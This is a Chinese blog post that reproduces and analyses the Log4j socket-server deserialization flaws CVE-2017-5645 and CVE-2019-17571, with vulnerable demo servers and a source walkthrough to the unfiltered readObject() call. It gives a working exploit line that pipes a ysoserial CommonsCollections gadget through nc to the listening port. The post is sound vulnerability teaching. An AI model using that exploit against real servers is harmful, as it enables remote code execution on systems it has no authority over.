【java安全】Log4j反序列化漏洞

最新推荐文章于 2024-07-20 15:43:15 发布
最新推荐文章于 2024-07-20 15:43:15 发布
阅读量2.3k 收藏 4
点赞数
分类专栏: java 文章标签: java 安全 log4j web web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/132360742
版权

文章目录

【java安全】Log4j反序列化漏洞

关于Apache Log4j

Log4j是Apache的开源项目,可以实现对System.out等打印语句的替代,并且可以结合spring等项目,实现把日志输出到控制台或文件等。而且它还可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码,满足了大多数要求。

就是用来打印日志的

漏洞成因

本文介绍的Log4j反序列化漏洞都是由于未对传入的需要发序列化的数据进行过滤,导致了恶意构造从而造成相关的反序列化漏洞

CVE-2017-5645

漏洞版本

Log4j 2.x <= 2.8.1

复现环境
  • jdk1.7
  • Log4j-api,Log4j-core 2.8.1
  • commons-collections 3.1
漏洞复现

pom.xml

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.8.1</version>
</dependency>

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.8.1</version>
</dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>

demo

public class Log4jDemo {
    public static void main(String[] args) {
        TcpSocketServer myServer = null;
        try {
            myServer = new TcpSocketServer(7777,new ObjectInputStreamLogEventBridge()); 
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        myServer.run();
    }
}

我们运行一下这个类,它会监听本地的7777端口,然后我们需要将数据传递进去

image-20230818131417998

然后我们使用ysoserial生成一条cc链,nc传给它即可触发漏洞:

java -jar ysoserial.jar CommonsCollections1 "calc" | nc 192.168.1.100 7777

image-20230818131536057

漏洞分析

我们先来分析TcpSocketServer#main()方法,启动Log4j后,通过createSerializedSocketServer()创建了一个socketServer

image-20230818132119096

然后会调用startNewThread()方法,我们跟进:

public Thread startNewThread() {
        Thread thread = new Log4jThread(this);
        thread.start();
        return thread;
    }

会调用线程的start()方法,于是我们跟进TcpSocketServer#run()方法中,run()首先会判断socket是否关闭,然后调用this.serverSocket.accept()去接受数据,赋值给clientSocket变量,然后去调用SocketHandler的构造方法,返回一个handler

image-20230818132635924

我们跟进一下SocketHandler类:

public SocketHandler(Socket socket) throws IOException {
            this.inputStream = TcpSocketServer.this.logEventInput.wrapStream(socket.getInputStream());
        }

发现socket将接收到的数据转换成ObjectInputStream对象,赋值给:this.inputStream

(因为之前我们的代码中将logEventInput赋值为ObjectInputStreamLogEventBridge对象了):

image-20230818134713431

所以这个对象的wrapStream()函数会返回ObjectInputStream对象

public ObjectInputStream wrapStream(InputStream inputStream) throws IOException {
        return new ObjectInputStream(inputStream);
    }

当我们调用完SocketHandler()后,返回handler,接着调用handler.start()这样就会调用SocketHandler#run()方法:

image-20230818135047430

run方法中会将前面的产生的ObjectInputStream对象传递给this.logEventInput.logEvents()方法中,我们跟进:

image-20230818135221918

该方法会调用inputStream#readObject()方法进行反序列化,并且整个步骤没有任何过滤,因此当我们传入的数据为恶意的cc链就可以触发反序列化漏洞了

CVE-2019-17571

这个也是类似的

漏洞版本

Log4j 1.2.x <= 1.2.17

漏洞复现

pom.xml

<dependency>
    <groupId>log4j</groupId>
    <artifactId>log4j</artifactId>   <!-- 注意这里使用的是log4j -->
    <version>1.2.17</version>
</dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

src/main/resources/log4j.properties

log4j.rootCategory=DEBUG,stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.threshold=DEBUG
log4j.appender.stdout.layout.ConversionPattern=[%d{yyy-MM-dd HH:mm:ss,SSS}]-[%p]-[MSG!:%m]-[%c\:%L]%n

Log4jDemo.java

public class Log4jDemo {
    public static void main(String[] args) {
        String[] arguments = {"7777", Log4jDemo.class.getClassLoader().getResource("log4j.properties").getPath()};
        SimpleSocketServer.main(arguments);
    }
}

还是和上面一样,执行,然后使用ysoserial:

java -jar ysoserial.jar CommonsCollections1 "calc" | nc 192.168.1.100 7777
image-20230818140251546
漏洞分析
public class Log4jDemo {
    public static void main(String[] args) {
        String[] arguments = {"7777", Log4jDemo.class.getClassLoader().getResource("log4j.properties").getPath()};
        SimpleSocketServer.main(arguments);
    }
}

首先跟进SimpleSocketServer.main()方法:

image-20230818140701512

开启SocketServer服务器后,会设置监听端口,然后accept()将接受到的数据赋值给socket对象,接着调用SocketNode()socket给传进去

image-20230818140902294

这里和上面类似,也会将接受到的数据以ObjectInputStream对象返回给this.ois

在后面调用Thread#start()方法后会继续调用SocketNode#run()方法:

image-20230818141110840

这里同样没有经过任何过滤,就将数据进行反序列化触发漏洞

参考

https://www.anquanke.com/post/id/229489#h2-0

https://xz.aliyun.com/t/7010#toc-3

https://github.com/Maskhe/javasec/blob/master/4.log4j%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.md

Tr4n
关注
专栏目录
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1666
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
log4j反序列化漏洞
g1345444的博客
02-19 1028
log4j2是apache下的java应用常见的开源日志库,是一个就Java的日志记录工具。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。需要说明的是,这里忽略了具体格式化时的逻辑,因为块数据格式化时使用的逻辑可能不同,而且与漏洞无关,重要的只有处理jndi表达式那块。406行的循环是一个重要的逻辑,最终的触发点也是在这个循环中产生的,这里的。为空,所以不会进这里的if语句;
【Apache Log4j Server 反序列化命令执行漏洞
qq_61947585的博客
07-06 414
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
log4j反序列化漏洞详解及利用
热门推荐
Mr.Wang的博客
12-20 1万+
Log4j漏洞详解:带你体验一把hacker之路!
Log4j 注入漏洞:深入理解JNDI注入与Java反序列化漏洞的利用
Java Punk
12-23 3474
我翻阅了许多专题文章,其中有2篇文章写的非常不错,完美解答了我对 “Log4j 注入漏洞” 的疑问
log4j反序列化漏洞原理
07-28
log4j反序列化漏洞是一种安全漏洞,它存在于Apache Log4j库中。该漏洞的原理是通过利用Log4j的JNDI(Java Naming and Directory Interface)功能,攻击者可以通过构造恶意的序列化数据来执行远程命令。 具体来说,...
log4j反序列化漏洞利用
06-07
2. 反序列化漏洞:当Log4j尝试解析包含恶意序列化数据的日志条目时,会触发一个恶意Java对象的创建,这个对象可以包含自定义的类加载器、执行代码等危险功能。 3. 类加载与代码执行:由于攻击者可以自定义对象和类...
javalog4j反序列化
最新发布
weixin_45653478的博客
07-20 1235
Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端获取对应的Class文件,使用ClassLoader在本地加载Ldap服务端返回的Class类。
Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 2932
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
[20][03][81] Log4j 反序列化漏洞(CVE-2019-17571)
安全新司机
12-16 1611
文章目录1. 组件基本信息1.1 pom 信息1.2 影响版本1.3 漏洞场景2. 漏洞复现2.1 引入pom组件2.2 新建 log4j.properties2.3 Log4jLeak 代码2.4 下载 ysoserial.jar2.5 生成 playload2.5 启动程序3. 漏洞源码分析3.1 SimpleSocketServer 类3.2 SocketNode 类4. 反射到外网 1. 组件基本信息 1.1 pom 信息 <groupId>log4j</groupId> &
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 3241
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)(漏洞复现详细过程)
Apache Log4j Server 反序列化漏洞(CVE-2017-5645)
Kevin's Blog
01-18 4797
文章目录一、漏洞介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御措施 一、漏洞介绍 1.1 漏洞介绍   Apache的一个开源的日志记录库,通过使用Log4j语言接口,可以在C、C++、.Net、PL/SQL程序中方便使用,其语法和用法与在Java程序中一样,使得多语言分布式系统得到一个统一一致的日志组件模块。通过使用三方扩展,可以将Log4j集成到J2EE、JINI甚至是SNMP应用中。但Log4j2.8.2之前的版本中存在反序列化漏洞。 1.2 影响版本 Log4j<2.8.2 二、
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
qq_62056583的博客
07-15 570
复现并分析【CVE-2017-5645】Apache Log4j Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞
log4j反序列化漏洞复现
qq_52263650的博客
05-31 1149
Apache Log4j 是一个用于 Java 的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2 之前的 2.x 版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1788
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
m0_68045701的博客
07-08 749
网络隔离:如果立即升级不可行,应将受影响的服务器与其他网络隔离,以减少攻击面。输入过滤:对于无法升级的环境,可以考虑实现自定义的输入过滤机制,以防止恶意的序列化数据被处理。监控日志:密切关注日志系统,寻找任何异常的日志事件或未经授权的访问尝试,并及时响应。Apache Log4j是一个广泛使用的Java日志记录库,它通过提供灵活的日志记录级别、日志格式和日志目的地等功能,成为了许多开发者和组织的首选日志工具。下载后打包成jar文件进行使用,也可以直接下载jar包,在该网址的下面,往下拉就可以看到了。
(环境搭建+复现)CVE-2019-17571 Apache Log4j SocketServer 反序列化漏洞
daxi0ng的博客
04-03 9299
1、【CVE编号】 CVE-2019-17571 2、【漏洞名称】 Apache Log4j SocketServer 反序列化漏洞 3、【靶标分类】 通用漏洞组件类靶标 4、【影响版本】 Log4j1.2.x<=1.2.17 5、【漏洞分类】 代码执行 6、【漏洞等级】 高 7、【漏洞简介】 Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个...
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4671
Log4j2 RCE漏洞原理与复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值